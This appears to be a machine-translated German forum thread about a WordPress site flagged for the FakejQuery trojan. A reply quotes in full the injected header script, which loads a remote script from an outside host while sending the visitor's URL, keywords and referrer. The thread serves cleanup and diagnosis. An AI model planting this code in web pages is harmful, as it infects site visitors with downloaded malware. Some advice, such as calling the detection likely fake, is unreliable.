Seit ich meine Website mit der Domäne verbunden i auf einigen Computern zu erhalten begonnen, dass die Website dieses Warring zu besuchen versuchen:Threat auf meiner Wordpress-Website
Den Zugriff auf die Web-Seite blockiert wurde. URL anzeigen
Bedrohung: JS/TrojanDownloader.FakejQuery.B Trojaner
was soll ich tun?
Wenn Sie einen Host für Ihre Domain durchgehen, erkundige ich mich bei ihnen nach einer Erklärung. In der Zwischenzeit/wenn Sie es selbst hosten, würde ich versuchen, die Shodan-Erweiterung für Chrome auf der Website laufen zu lassen, um nach anderen aktiven Ports zu suchen, die die verbindenden Clients beeinflussen könnten. Überprüfen Sie alle Ihre Javascript-Dateien auf etwas, das fischig sein könnte.
Das sieht ehrlich nach meiner Erfahrung falsch aus. Es sieht mehr wie etwas aus, das eine Ransomware anstelle eines tatsächlichen Trojaners verwenden würde. Wenn Sie kein Javascript auf Ihrer Website haben, würde ich fast garantieren, dass es nicht real ist.
Ich bin gerade auf diesen Beitrag gestoßen, da ich einen Kunden habe, dessen Website von diesem Virus angegriffen wurde. Die Seite war nicht eine von meinen, die ich hinzufügen würde, und Wordpress 3.6 laufen (ziemlich alt jetzt).
Ich ging durch die Theme-Dateien, und fanden diese in den Header hinzugefügt:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
ich durch das Entfernen dieser aus dem Header des Themas die Warnung für den Trojaner wegging gefunden.
Wert zu entfernen.
Zeigen Sie [hier] (https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery) und [hier] (https: // blog .sucuri.net/2015/11/jquery-min-php-malware-beeinflusst-tausende-von-websites.html). Vielleicht hilft es. –
Welchen Host verwenden Sie? – Kevin
Ich werde den Host kontaktieren und werde es lesen, wird mit einer Antwort aktualisieren – ssabin